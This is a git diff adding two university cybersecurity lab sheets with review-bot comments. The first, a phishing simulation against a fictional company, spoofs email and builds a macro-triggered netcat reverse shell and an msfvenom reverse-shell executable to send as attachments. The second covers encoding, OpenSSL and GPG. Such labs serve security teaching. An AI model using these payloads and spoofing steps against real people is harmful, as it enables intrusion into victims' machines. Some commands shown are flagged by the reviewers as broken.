diff --git a/_labs/cyber_security_landscape/3_phishing.md b/_labs/cyber_security_landscape/3_phishing.md new file mode 100644 index 0000000..ae8d8a8 --- /dev/null +++ b/_labs/cyber_security_landscape/3_phishing.md 
@@ -0,0 +1,341 @@ +--- +title: "Human Factors and Social Engineering: Phishing" +author: ["Z. Cliffe Schreuders", "Tom Shaw"] +license: "CC BY-SA 4.0" +description: "Learn about human factors in cybersecurity through hands-on phishing simulation. Practice social engineering techniques, email spoofing, and creating malicious attachments to understand how attackers exploit human psychology." +overview: | + Humans play a crucial role in the cyber security of systems and information. Many attacks target users and their mental models of cyber security systems and risk. For example, if an attacker can trick a user into performing tasks for them, the attacker can achieve their goals and gain access that they are not authorised to. Human behavior often serves as both the first line of defense and the weakest link. This lab delves into the critical role humans play in safeguarding systems and information. It highlights the fact that even the most robust technical defenses can be compromised due to human error and deception. This lab primarily focuses on a pervasive cyber threat - phishing attacks. Phishing, an artful manipulation of human psychology, lures individuals into compromising security by tricking them into revealing sensitive information, clicking malicious links, or installing malware. Through this hands-on exercise, you will gain insights into how attackers exploit human vulnerabilities, learn the tactics used to craft convincing phishing emails, and explore techniques to create malicious attachments that can compromise a user's system. + + In this lab, you will embark on a simulated cybersecurity mission within a fictitious organization. Your objective is to browse the organization's website to gather information on employees, email addresses, and their potential interests. 
You will then employ the tactics of engagement by sending targeted phishing emails to these individuals, using techniques such as spoofing emails, creating malicious attachments (executable programs, LibreOffice documents with macros), and more. As your victims respond to your emails, they will reveal why they trust or distrust your messages, providing invaluable feedback. The ultimate goal is to persuade these users to open the malicious attachments, granting you remote access to their systems. Your mission culminates in accessing the coveted "flag" files hidden in each victim's home directory, which you will submit as proof of your success. This lab offers a unique opportunity to understand how cybersecurity threats exploit human psychology, providing a practical foundation to enhance cyber awareness and strengthen defenses against these deceptive tactics. +tags: ["phishing", "social-engineering", "email-security", "human-factors", "malware", "macros"] +categories: ["cyber_security_landscape"] +lab_sheet_url: "https://docs.google.com/document/d/1Yb28GYRLD0Ihnb5oeFp-TGurhb8BZfm_qFbSSrGEknI/edit?usp=sharing" +type: ["ctf-lab", "lab-sheet"] +difficulty: "easy" +cybok: + - ka: "HF" + topic: "Human Error" + keywords: ["latent usability failures in systems-of-systems"] + - ka: "AB" + topic: "Attacks" + keywords: ["SOCIAL ENGINEERING", "MALICIOUS ACTIVITIES BY MALICIOUS ATTACHMENTS"] + - ka: "MAT" + topic: "Attacks and exploitation" + keywords: ["EXPLOITATION FRAMEWORKS", "MALCODE/MALWARE - SOCIAL ENGINEERING - BAITING", "MALCODE/MALWARE - SOCIAL ENGINEERING - PRETEXTING", "MALCODE/MALWARE - VIRUSES - MACRO VIRUSES", "MALCODE/MALWARE - SPAM", "MALCODE/MALWARE - SPOOFING"] + - ka: "WAM" + topic: "Client-Side Vulnerabilities and Mitigations" + keywords: ["E-MAIL - PHISHING", "E-MAIL - SPOOFING"] +--- + +# Introduction to Human Behaviour and Cyber Security + +Humans play a crucial role in the cyber security of systems and information. 
Many attacks target users and their mental models of cyber security systems and risk. For example, if an attacker can trick a user into performing tasks for them, the attacker can achieve their goals and gain access that they are not authorised to. + +It is often said that “the user is the weakest link in security”, because **human error** can have as much impact as a technical vulnerability, and it is often possible regardless of how strong technical defences are. + +As a consequence, cyber security awareness training is an important part of an organisation’s cyber security programme. It is also important that the security that is put in place needs to be usable/understandable and acceptable to users. + +## Introduction to Phishing {#introduction-to-phishing} + +One way that users are attacked is through phishing emails. A phishing email attack is an email that tricks the user into performing actions such as revealing sensitive information, clicking links that trigger technical web attacks, or installing malware. This lab focuses on the latter, malicious code sent via email. If an employee opens a malicious attachment, such as a document with macros or an executable program, then an attacker can take direct control of that user’s computer. + +## Preparation {#preparation} + +Access the challenge via Hacktivity. + +We have automated most of the setup required for the lab, except you need to setup Thunderbird email client manually, and disable the proxy for Firefox. + +==VM: On Kali Linux== + +==action: Login with user: kali, password: kali==. + +==action: Start by opening Thunderbird (Applications → Usual Applications → Internet → Thunderbird)==. + +![][image-2] + +Thunderbird may take a minute to start. + +==action: Enter these details:== + +* Full name: Guest +* Email address: guest@accountingnow.com +* Password: guestpassword + +![][image-3] + +![][image-4] + +==action: Click "Continue" and "Done"==. 
+ +> Warning: **If prompted** with a warning, accept the lack of encryption between the server and the client: + +![][image-5] + +==action: "I understand the risks", "Confirm" and "Confirm security exception"==. + +> Note: In real life, you should not use email that has no encryption between the server and client. We will explore email security further in a future topic. + +![][image-6] + +==action: Click "Confirm Security Exception"==. + +==action: Click "Finish"==. + +==action: Open Firefox (Applications → Usual Applications → Internet → Firefox)==. + +Firefox may take a minute to start. + +==action: Disable the proxy in Firefox (Menu → Preferences)==: + +![][image-7] + +==action: Scroll down to the bottom of the page: Network Settings → "Settings"== + +![][image-8] + +![][image-9] + +==action: "No proxy"== + +==action: Click "OK."== + +## The aim and tasks in this lab {#the-aim-and-tasks-in-this-lab} + +This lab provides a simulated organisation scenario, where you will: + +* Browse the organisation’s website to identify employees, email addresses, potential friendships and interests. +* Send emails to them to trick them into running attachments, by crafting a convincing email by including keywords, names, spoofed email addresses, and content. +* Send them malicious attachments: executable programs, libreoffice documents. +* When you get the victims to open these attachments, you can gain remote access to their s\`stem, and get a flag for each user you trick this way. + +The aim is to get access to the “flag” file from each victim’s home directory, which contains flags for you to submit to Hacktivity. + +## Reconnaissance: browse the website {#reconnaissance:-browse-the-website} + +==VM: From within your VM==, ==action: Browse to our target organisation: http://accountingnow.com== (this is a fictional organisation that exists in your VM, don't visit the actual Internet site with this URL\!) 
+ +![][image-10] + +==action: Look through all the pages on this website and document all the employee's names and email addresses that you can find==. + +## Engagement: send phishing emails {#engagement:-send-phishing-emails} + +==action: From your list of email addresses, try sending an email to one of them from within Thunderbird: click "Write"==. + +![][image-11] + +==action: Type a message and click "Send"==. + +==action: Check your email to see what reply you get (Click "Get Messages", wait and check again if you don't have a reply yet)==. The reply may look something like the following: + +``` +I'm not accepting this email because: + +* I don't trust the sender + +* The message doesn't include the sender's name + +* It's not addressed to me + +* It's unrelated to me + +---------- + +Hello there! +``` + +In this simulation your victims will reply and tell you why they are not choosing to trust the email (unlike in real life\!). Once they trust your email they won't reply, they will instead open any attachments they trust. + +> Hint: Each victim will only open certain types of attachments, or none at all. + +> Flag: Each victim has a flag file in their home directory, containing the flag you need to access to succeed at the challenge. + +> Tip: You can write a similar email by viewing your sent folder, and right click → "Edit As New Message". + +# Hint: Spoofing emails {#hint-spoofing-emails} + +You can change the email address that the email is sent "from" – without knowing any passwords for the accounts. This is due to a fundamental security issue in the way emails are authenticated. Not all outgoing email servers require authentication that matches the email address on the email. There are protections in place that means that emails that are sent from untrusted email servers may not be accepted; however, further discussion is outside the scope of this exercise. 
+ +==action: To change your sender email address, click the drop-down selector next to your From address, and click "Customize From Address"==. + +![][image-12] + +> Note: In this simulation you will still receive reply messages, unlike real life where replies would be sent to the spoofed email address. + +# Hint: Creating malicious attachments {#hint-creating-malicious-attachments} + +> Hint: The types of malicious attachments that you should try sending includes: + +* Executable programs +* LibreOffice Writer (word processor .odt files) with Macros +* LibreOffice Calc (spreadsheet .ods files) with Macros + +> Hint: Think about the kinds of jobs people have and which kinds of documents they are most likely to receive and open – for example, is someone working in finance most likely to accept a program or a spreadsheet? + +> Tip: If you want an additional challenge, skip these hints, and send your own payloads of choice. + +## Hint: creating malicious macros that execute when the document is opened {#hint-creating-malicious-macros-that-execute-when-the-document-is-opened} + +Office documents, such as Microsoft Word or Excel, or LibreOffice Writer or Calc, can have macros saved within them. Macros are programming scripts (often written in a Visual Basic based programming language) that can be used to automate calculations and modifications to documents, but can also access external resources and execute operating system commands. + +Due to the damage they can do, in recent years by default a document with Macros will warn the user against running untrusted macros. However, in this scenario we are dealing with users who say "ok" to everything. + +> Tip: If you want an additional challenge, skip this hint, and send your own payload of choice. + +==action: You can create a document with a macro:== + +==action: Open LibreOffice Writer (Applications → Usual Applications → Office → LibreOffice Writer)==. 
+ +==action: Click menu Tools → Macros → Organise Macros → Basic…== + +==action: Click Untitled 1 (or the name of the current file)== + +==action: Click "New"== + +==action: Name the macro anything, such as "macro"== + +==action: Enter the source code for your Macro==. Here is an example of a macro that runs a shell command (in this case creating a file "thisisatest" in the current working directory of the program: + +```vb +Sub Main + Shell("/bin/touch", vbNormalFocus, "thisisatest") +End Sub +``` + +==action: After you have entered some code, to get the macro to run when the document is opened:== + +==action: Minimise the Macro code window==. + +==action: Click the document's menu Tools → Customise → Events (tab)== + +==action: Select "Open Document"== + +==action: Click "Macro…"== + +> Tip: If you cannot see your macro, you may have opened the 'Customise' pane via the Macro window's toolbar rather than the Document window's toolbar. + +==action: Expand the "+" next to Untitled 1, Standard, macro, and select the Main on the right==. + +![][image-13] + +==action: Type some content into your document and save it as an .odt file==. + +Now when you open the document up it will try to execute it (if your victim's macro security settings are set low, and they agree to run it). + +==action: Try open the document that you just created locally on the Kali VM in LibreOffice Writer==. + +![][image-14] + +You will see a warning at the top of the page suggesting that the macro will not run. This is due to the fact the Kali VM has a restrictive macro security setting, but this is not always the case. 
+ +==action: In order to simulate the attack locally you should downgrade your macro security settings:== + +==action: Click the document's Tools → Options== + +==action: Select LibreOffice → Security from the side panel, then click Macro Security…== + +![][image-15] + +==action: Change the Security Level to Low== + +It is worth noting that the Medium level requires confirmation from the user, but still allows them to run macros if they accept the risks. When the user accepts the warning, macros will execute. + +Some word processors are configured this way by default and it is common for less technically proficient end-users to click through security warnings without understanding the consequences. + +==action: You can create a macro that creates a simple reverse shell using nc:== + +```vb +Sub Main + Shell("/bin/nc", vbNormalFocus, "-e /bin/sh ==edit:KALI_IP_ADDRESS== 8080") +End Sub +``` + +Where ==edit:KALI_IP_ADDRESS== is the IP address reported from: + +```bash +hostname -I +``` + +==action: On Kali, start listening for connections, before the document is opened:== + +```bash +nc -lvvp 8080 +``` + +When your victim opens the document, the reverse shell will be triggered connecting back to your Kali system. If you have started the listener, you will be greeted with shell access to the victim. + +> Tip: It can take a minute or two for LibreOffice to launch on the victim, so be patient. 
+ +## Hint: creating malicious executable programs (malware payload) {#hint:-creating-malicious-executable-programs-(malware-payload)} + +==VM: On Kali== ==action: start a netcat listener, and leave this running; your victim will connect back to this:== + +```bash +nc -lvvp 4444 +``` + +Where ==edit:KALI_IP_ADDRESS== is the IP address reported from: + +```bash +hostname -I +``` + +==VM: On Kali== ==action: create a reverse tcp payload, by using metasploit:== + +```bash +msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp LHOST==edit:KALI_IP_ADDRESS== LPORT=4444 -f elf -o malware +``` + +You can send the malware file as a malicious attachment. When a victim opens it, it will connect back to your Kali system with a connection to run shell commands. + +## Hint: accessing the flag files {#hint:-accessing-the-flag-files} + +> Flag: A flag file can be found in each victim's home directory. Read the flag, by gaining shell access to their system, then running commands. + +Once you have a shell connection to the victim you can start running commands such as: + +==action: List all files, showing details:== + +```bash +ls -la +``` + +==action: Read the contents of a file named flag in the current directory:== + +```bash +cat flag +``` + +> Flag: Submit the flags to Hacktivity! + +## Conclusion {#conclusion} + +At this point you have: + +* Seen how information from public sources, such as websites can inform spear phishing attempts + +* Spoofed emails, and crafted messages to trick users + +* Experienced adversarial phishing behaviours – using macros and executable payloads to attack users + +Well done\! + +Note that these example attacks rely on poor user behaviour rather than vulnerable systems. Hopefully these attacks wouldn’t work against well informed users; however, it helps to illustrate how spear phishing attacks are conducted, and the danger of poor “cyber hygiene”. 
+ +It is important to ensure users are cyber security aware enough not to fall for these kinds of tricks. + +[image-1]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-1.png +[image-2]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-2.png +[image-3]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-3.png +[image-4]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-4.png +[image-5]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-5.png +[image-6]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-6.png +[image-7]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-7.png +[image-8]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-8.png +[image-9]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-9.png +[image-10]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-10.png +[image-11]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-11.png +[image-12]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-12.png +[image-13]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-13.png +[image-14]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-14.png +[image-15]: {{ site.baseurl }}/assets/images/cyber_security_landscape/3_phishing/image-15.png diff --git a/_labs/cyber_security_landscape/4_encoding_encryption.md b/_labs/cyber_security_landscape/4_encoding_encryption.md new file mode 100644 index 0000000..977be7c --- /dev/null +++ b/_labs/cyber_security_landscape/4_encoding_encryption.md 
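Review bot: in 3_phishing.md, the msfvenom command under "creating malicious executable programs" reads `LHOST==edit:KALI_IP_ADDRESS== LPORT=4444`, so the `=` after LHOST doubles as the opening of the `==edit:…==` marker; depending on how the marker is rendered the student either loses the equals sign or copies a broken marker, and the payload is built without a valid LHOST. Write it as `LHOST===edit:KALI_IP_ADDRESS==` (the macro example a few lines earlier gets this right by keeping the marker standalone). In the same section the sentence "Where ==edit:KALI_IP_ADDRESS== is the IP address reported from: hostname -I" sits under `nc -lvvp 4444`, which does not use the placeholder; move it below the msfvenom block where it is actually needed. Smaller points: "gain remote access to their s\`stem" in the aim bullets should read "system"; the macro explanation "(in this case creating a file "thisisatest" in the current working directory of the program:" never closes its parenthesis; the heading IDs `{#reconnaissance:-browse-the-website}`, `{#engagement:-send-phishing-emails}` and `{#hint:-creating-malicious-executable-programs-(malware-payload)}` carry colons and parentheses that the other explicit IDs (`{#hint-spoofing-emails}`) omit, so either normalise them or drop the explicit IDs and let the generator produce them; `[image-1]` is defined in the reference list but never referenced in the body.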
@@ -0,0 +1,466 @@ +--- +title: "Introduction to Cryptography: Encoding and Encryption" +author: ["Mo Hassan", "Z. Cliffe Schreuders"] +license: "CC BY-SA 4.0" +description: "Learn essential cryptography concepts through hands-on practice with encoding schemes, hash algorithms, OpenSSL, and GPG. Master data encoding, symmetric and asymmetric encryption, and key management." +overview: | + Cryptography is a fundamental aspect of information security, enabling us to secure data from prying eyes and malicious actors. This hands-on lab will equip you with essential knowledge and skills related to encoding schemes, hash algorithms, and the use of tools like OpenSSL and Gnu Privacy Guard (GPG). You'll explore concepts like encoding data into different formats, encrypting and decrypting information, and managing keys. These skills are crucial for anyone interested in the field of cybersecurity, data protection, or simply understanding how secure communication works in the digital age. + + Throughout the lab, you'll learn to encode strings into various formats, including hexadecimal and Base64. You'll experiment with symmetric key encryption using the Data Encryption Standard (DES) and the Advanced Encryption Standard (AES). Additionally, you'll explore public-key cryptography with GPG, creating and managing keys, encrypting and decrypting data, and understanding the importance of key pairs. + + In the home directory of your VM there are a series of encoding and encryption CTF challenges for you to complete, to put your knowledge into practice. 
+tags: ["cryptography", "encoding", "encryption", "openssl", "gpg", "base64", "aes", "des"] +categories: ["cyber_security_landscape"] +lab_sheet_url: "https://docs.google.com/document/d/1wKm2c7yxhM-9GnAiS_Mgvk_8-H7FKEBeGeMc6H0KlwA/edit?usp=sharing" +type: ["ctf-lab", "hackerbot-lab", "lab-sheet"] +difficulty: "intermediate" +cybok: + - ka: "AC" + topic: "Algorithms, Schemes and Protocols" + keywords: ["Encoding vs Cryptography", "Caesar cipher", "Vigenere cipher", "SYMMETRIC CRYPTOGRAPHY - AES (ADVANCED ENCRYPTION STANDARD)"] + - ka: "F" + topic: "Artifact Analysis" + keywords: ["Encoding and alternative data formats"] + - ka: "WAM" + topic: "Fundamental Concepts and Approaches" + keywords: ["ENCODING", "BASE64"] +--- + + + +## Purpose + +The purpose of this lab is to familiarise students with common encoding schemes, hash algorithms, basic OpenSSL and Gnu Privacy Guard (GPG). + +## Introduction to Encoding and Encryption + +There are lots of different ways of representing information. **Encoding methods** are designed to be reversible and involve transforming data into different formats. In contrast, **encryption** involves transforming data into a format that is only readable with a key or password. + +Encoding and encryption are important concepts, and the ability to identify and apply these are highly relevant skills to develop. In this lab you will familiarise yourself with common encoding methods, and some fundamental and common encryption schemes. + +> Note: You will apply these skills time and time again throughout your academic and working life in IT and cyber security. Digital forensics makes extensive use of encoding/decoding, to make sense of digital artefacts, and this also applies to other cyber security topics. + +## Are you ready to encode some data? + +**Encoding data** involves changing it into a new format using a reversible scheme. Encoding is reversible – data can be encoded into a format then decoded back to the original format. 
Usually encoding is done using publicly known schemes, and is typically done to make it easier to transfer, store, or use data. Encoding is often applied for compatibility reasons. + +> Tip: You can use `iconv -l` command to list all the known coded character sets ☺. + +In this section you learn how to use Linux Command Line Interface (CLI) to encode/decode using some of those schemes. + +## Character Encoding and ASCII + +For example, the string "hello!" can be represented in ASCII (decimal): +* 104 101 108 108 111 + +ASCII (American Standard Code for Information Interchange) is a character encoding scheme for electronic communication. Character encoding schemes translate text into a format so that they can be stored and transferred electronically. Most modern character encoding schemes, such as Unicode (UTF-8 being the most common) are based on ASCII, and support many more symbols, such as emoji (😃). + +In the above example, we are using a decimal format: base 10, like our typical number system we use in mathematics, using the 10 numbers: 0, 1, 2, 3, 4, 5, 6, 7, 8, and 9. + +## Convert a string to byte and then to hex + +You can use any Linux distribution for this lab, please refer to Hacktivity guide to create your own VM. + +==action: Open Linux CLI and type python3 (to open python3 command prompt) followed by the code below:== + +```python +myString="Valhalla!".encode('utf-8') +myStringInHex=myString.hex() +print(myStringInHex) +# Of course you can use print function directly +print(myString.hex()) +``` + +## Hexadecimal (base 16) and Binary (base 2) + +Likewise "hello!" also translates to "68 65 6c 6c 6f 21" in hex (hexadecimal), and "01101000 01100101 01101100 01101100 01101111 00100001" in binary. + +==action: Run these commands in a Linux shell:== + +```bash +echo hello! | xxd -b +``` + +```bash +echo hello! | xxd +``` + +Hexadecimal (also known simply as "hex") is a base 16 numeral system. 
That is, the information is represented using the 16 symbols: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, d, e, f. + +Hex is also a common way of displaying "binary data"; that is, non-text data, which is not human readable. For example, pixels in an image are not made up of human readable text (if binary data is translated to ASCII it results in gibberish use of symbols). + +> Note: There are many practical reasons for doing these translations between formats. For example, if we want to store any data to disk (whether text or an image), the storage medium itself records data in a binary format. + +## Base64 + +Another popular encoding method is Base64, which uses the symbols: 0-9, a-Z, A-Z, +, /, and also uses = for padding. Base64 is often used with Web technologies, as a safe way of encoding binary data (and is more efficient than using hex). + +Base-N encoding is simply a representation of sequence octets in a form that allows the use of both upper and lowercase letters but that need not be human readable. In Base-64, a 65-character subset of US-ASCII is used, enabling 6 bits to be represented per printable character. (The extra 65th character, "=", is used "usually" for padding). The encoding process represents 24-bit groups of input bits as output strings of 4 encoded characters. Proceeding from left to right, a 24-bit input group is formed by concatenating 3 8-bit input groups. These 24 bits are then treated as 4 concatenated 6-bit groups, each of which is translated into a single character in the base 64 alphabet. Each 6-bit group is used as an index into an array of 64 printable characters. 
The character referenced by the index is placed in the output string\[RFC4648\] + +![][image-2] +*Figure 1: The Base 64 Alphabet* + +![][image-3] +*Figure 2: Example of base64 encoding (no padding used)* + +![][image-4] +*Figure 3: Example of base64 encoding (with pad "=")* + +==action: Open Linux CLI and type the following commands:== + +```bash +echo "0x14fb9c03d97e" | xxd -r -p | base64 +echo "0x14fb9c03" | xxd -r -p | base64 +``` + +> Note: The output should match the above examples (figures 2 and 3) + +==action: Another basic example of encoding and decoding data using base64:== + +```bash +echo "Valhalla" | base64 +``` + +Output: +``` +VmFsaGFsbGEK +``` + +==action: To decode:== + +```bash +echo "VmFsaGFsbGEK" | base64 -d +``` +``` +Valhalla +``` + +> Tip: Congratulations! you are now an expert in encoding and decoding data ☺ + +## Let's do a bit more + +==action: Still using Linux command prompt:== + +```bash +echo "Valhalla" | xxd -p +``` +``` +56616c68616c6c610a +``` + +```bash +echo "Valhalla" | base64 | xxd -p +``` +``` +566d4673614746736247454b0a +``` + +```bash +echo "566d4673614746736247454b0a" | xxd -r -p | base64 -d +``` +``` +Valhalla +``` + +==action: Try to understand what is going on and use different words/strings...== + +> Hint: Use `man base64` and `man xxd` to understand the command options/switches... + +==action: Let's create a file and name it fruitSalad.txt== + +We'll use iconv command, which is a tool to convert text from one character encoding to another. + +> Tip: You can use `iconv -l` to list known encoding scheme. + +```bash +cat << EOF > fruitSalad.txt +Banana =+ +Orange ?! 
+Apple &^% +Strawberry $"/ +Appricot ' |Z +$Grapefruit% +==-Graps?() +EOF +``` + +==action: Convert fruitSalad.txt to something else:== + +```bash +iconv -f ASCII fruitSalad.txt -t EBCDIC-CP-GB -o fileEncoded.xyz +``` + +```bash +cat fruitSalad.txt +``` + +==action: To reverse the operation (decode), run this command:== + +```bash +iconv -f EBCDIC-CP-GB fileEncoded.xyz -t ASCII +``` + +> Hint: Use `man iconv` to understand the command options/switches... + +## Introduction to Cryptography and Encryption + +**Cryptography** is the study of secure communication in the presence of third parties, or "the art and science of concealing meaning" (Matt Bishop). The word "cryptography" is from Greek words meaning "secret writing". Cryptography can maintain data security in an insecure environment. Modern crypto employs complex math to achieve this. The emphasis of this lab is on implementation and system security, not the mathematics itself. + +## Simple encryption/decryption using OpenSSL + +OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) network protocols and related cryptography standards required by them. +The openssl program is a command line tool for using the various cryptography functions of OpenSSL's crypto library from the shell. 
It can be used for: + +* Creation and management of private keys, public keys and parameters + +* Public key cryptographic operations + +* Creation of X.509 certificates, CSRs and CRLs + +* Calculation of Message Digests + +* Encryption and Decryption with Ciphers + +* SSL/TLS Client and Server Tests + +* Handling of S/MIME signed or encrypted mail + +* Time Stamp requests, generation and verification + +==action: To list the cipher commands & algorithms supported by OpenSSL, type the following commands:== + +```bash +openssl list -cipher-commands +``` + +```bash +openssl list -cipher-algorithms +``` + +## Symmetric Key Cryptography + +**Symmetric key cryptosystems** use the same key to encrypt and decrypt. As shown in the figure below, the plaintext data is encrypted using a key to produce ciphertext, and using the same key produces the original plaintext. + +> Note: Which is more secure: AES or DES? + +There are many tools to perform encryption, including OpenSSL. + +> Question: What is the name of the high-impact security vulnerability that was discovered in OpenSSL in 2014? Does this affect the security of symmetric key encryption? + +## Data Encryption Standard (DES) + +Data Encryption Standard (DES) is a block cipher designed by IBM in 1970s and was based on Feistel Cipher. It is a symmetric key algorithm uses key size of 56-bit (keyspace is 256) which is too small to be secure nowadays. + +==action: Create a file and name it coconut.txt either using your preferable text editor or directly from the Linux terminal as per the example below:== + +```bash +cat << EOF > coconut.txt +What 8-letter word can have a letter taken away and it still makes +a word; take another letter away and it still makes a word; +keep on doing that until you have one letter left. What is the word? 
+EOF +``` + +==action: Now, we'll use DES (symmetric-key) algorithm to encrypt coconut.txt:== + +```bash +openssl enc -e -des-cbc -pbkdf2 -in coconut.txt -out coconut.enc +``` + +> Note: You will be prompt to enter a password (the key) +> Warning: The password will NOT be echoed (printed to the screen) + +The above command will use Data Encryption Standard (DES) cipher with CBC mode to encrypt coconut.txt using a key derived from a password. + +| enc | encoding with ciphers | +| \-des-cbc | des algorithm with cipher block chaining (cbc) mode | +| \-pbkdf2 | password-based key derivation function 2 | +| \-in | input file | +| \-out | output file | + + +==action: To decrypt:== + +```bash +openssl enc -des-cbc -d -in coconut.enc -out getMyFileBack.txt +``` + +> Note: `-d` here for decryption + +> Question: This nicely illustrates the key distribution problem. What is the "key distribution problem"? + +## Advanced Encryption Standard (AES) + +* AES is a 128-bit block (symmetric-key based) cipher with a variable key size of 128, 192 or 256 bits. It uses a mix of encryption/decryption techniques such as substitution, permutation, shifting and xoring (for key generation). + +==action: In this example we'll encrypt coconut.txt using openssl (aes):== + +```bash +openssl enc -e -aes-128-cbc -pbkdf2 -k Hello -in coconut.txt -out coconut-eas-128.enc +``` + +> Note: `-k` here is for a passphrase + +==action: To decrypt:== + +```bash +openssl enc -d -aes-128-cbc -pbkdf2 -in coconut-eas-128.enc -out coconut-decrypted-128.txt +``` + +> Note: You will need to enter the passphrase used ("Hello" as per the above example). + +> Tip: You can use key size of 128-bit or 192-bit or 256-bit (-aes-128-cbc, -aes-192-cbc, -aes-256-cbc) in CBC mode or ECB mode (e.g. -aes-256-ecb). + +## Public Key (AKA Asymmetric) Cryptography + +**Public key (AKA asymmetric) cryptosystems** use separate keys for encryption and decryption. 
It is safe to tell anyone the encryption key, and only the person holding the decryption key can determine the original message. + +Public keys can be made public: for example, used to encrypt messages intended for only the holder of the private key. + +> Warning: Private keys must be kept secret (as with asymmetric keys): for example, used to decrypt messages. If a private key is known by a third party they can decrypt and modify any previous communications. + +> Question: What are the disadvantages of sharing public keys via insecure channels? + +## Gnu Privacy Guard (GPG) + +GNU Privacy Guard (GnuPG) is an FOSS alternative to Pretty Good Privacy (PGP), following the OpenPGP standard, which provides public key crypto. + +* GPG Manual: http://www.gnupg.org/gph/en/manual.html + +==action: To create a key:== + +```bash +gpg --gen-key +``` + +You'll be prompted to enter a password or passphrase (for your private/secret key), you can leave it blank. However, it is highly recommended to create one. + +==action: Export a public key into file public.key:== + +```bash +gpg --export -a "User Name" > yourname_publicKey.txt +``` + +> Note: The above command will create a file called yourname_publicKey.txt with the ascii representation of the public key for User Name. + +==action: Export a private key:== + +```bash +gpg --export-secret-key -a "User Name" > yourname_privateKey.txt +``` + +> Note: The above command will create a file called yourname_privateKey.txt with the ascii representation of the private key for User Name. 
+ +==action: To list the keys in your public key ring:== + +```bash +gpg --list-key +``` + +==action: To list the keys in your secret key ring:== + +```bash +gpg --list-secret-keys +``` + +==action: To generate a short list of numbers that you can use via an alternative method to verify a public key, use:== + +```bash +gpg --fingerprint > fingerprint +``` + +==action: To encrypt data:== + +```bash +gpg -e -u "Sender User Name" -r "Receiver User Name" file +``` + +The recipient (Receiver User Name) public key should be imported to your key ring first. + +> Note: File here is the plaintext, after the encryption process a ciphertext will be generated as file.gpg within the current working directory, which can be decrypted as per the example below. + +==action: To decrypt data:== + +```bash +gpg -d file.gpg +``` + +==action: To edit/revoke key:== + +```bash +gpg --edit-key Username +``` + +```bash +gpg --gen-revoke Username +``` + +## Using stand alone VM + +You will have generated your public key in step no. 1 + +You can use a stand alone testing environment and create two users on the same machine, exchange the keys and test using the commands below. + +==action: Create two users:== + +```bash +sudo useradd -m -s /bin/bash user1 ; sudo useradd -m -s /bin/bash user2 +``` + +==action: Generate pair of keys for each user and export ONLY public key to a file:== + +```bash +gpg --gen-key +``` + +```bash +gpg --export -a "user1" > user1_publicKey.txt +``` + +> Note: Do the same as above for user2 + +==action: Exchange public keys between user1 and user2:== + +> Note: As user1 import user2 public key (and of course vise versa) + +```bash +gpg --import user2_publicKey.txt +``` + +==action: Create a file (message/plaintext) and encrypt it with user2's public key as per the example in step 7 above.== + +==action: User2 can decrypt the message sent from user1 as per the example in step no. 
8== + +## CTF Challenges + +> Flag: We have VMs on Hacktivity containing some challenges related to basic cryptography, mainly encoding, hashing, etc.. + +==action: Log-in to Hacktivity (https://hacktivity.leedsbeckett.ac.uk/hacktivities/53)==. + +==action: Click on Activate and start challenge, then click on Desktop to start the VM, this may take a few minutes==. + +Once the VM is up and running, you should be able to login automatically. + +You will find all of the challenges in the user's home directory (e.g. /home/random_name) and under /srv directory. + +Mainly, there are four directories you need to work on, three under /home/user-name/{encoded, encrypted, secrets} and one under /srv. + +> Tip: Also, CyberChef (a nice and handy tool to explore cryptography) will be loaded automatically, feel free to use it for the CTF challenges or any other tool(s) if you wish. + +> Flag: All of the flags in the form of: flag{astringofrandomwords} – all lowercase, so if the encoding method doesn't support case, you will need to convert yourself. + +> Hint: The string to decimal doesn't separate the values with a space, so you will need to do that part yourself. For example: "97112112108101" would be "apple" but you need to add the separators before CyberChef will translate it: "97 112 112 108 101" + +The zip file in /srv needs sudo to access it, the user's password is "tiaspbiqe2r" (this is a secure password but is quite easy 2 remember). + +```bash +sudo unzip /srv/protected.zip +``` + +> Flag: Good luck! + +[image-1]: {{ site.baseurl }}/assets/images/cyber_security_landscape/4_encoding_encryption/image-1.png +[image-2]: {{ site.baseurl }}/assets/images/cyber_security_landscape/4_encoding_encryption/image-2.png +[image-3]: {{ site.baseurl }}/assets/images/cyber_security_landscape/4_encoding_encryption/image-3.png +[image-4]: {{ site.baseurl }}/assets/images/cyber_security_landscape/4_encoding_encryption/image-4.png + 
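Review bot: The DES decrypt command will not recover the file: encryption is done with `openssl enc -e -des-cbc -pbkdf2 ...`, but the matching decrypt `openssl enc -des-cbc -d -in coconut.enc -out getMyFileBack.txt` omits `-pbkdf2`, so `enc` falls back to the legacy EVP_BytesToKey derivation, derives a different key and fails with "bad decrypt" even when the same password is entered; add `-pbkdf2` to the decrypt line as the later AES pair already does. Two more points in the same region: on OpenSSL 3.x single DES is only available from the legacy provider, so the lab should either note `-provider legacy -provider default` or expect students to hit an "unsupported" error; and `-aes-128-cbc -pbkdf2 -k Hello` puts the passphrase on the command line where it lands in shell history and process listings, which is worth a one-line caveat given that the surrounding text is explaining key handling. In the DES introduction "keyspace is 256" has lost its exponent and should read 2^56. The cross-references are also broken: "step no. 1", "step 7" and "step no. 8" in the stand-alone VM section point at numbered steps that do not exist (the actions are unnumbered `==action:` blocks), "As shown in the figure below" under Symmetric Key Cryptography has no image, and the `[image-1]`..`[image-4]` link definitions at the end are never used in the body, with `4_encoding_encryption/image-1.png` not added anywhere in this patch.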
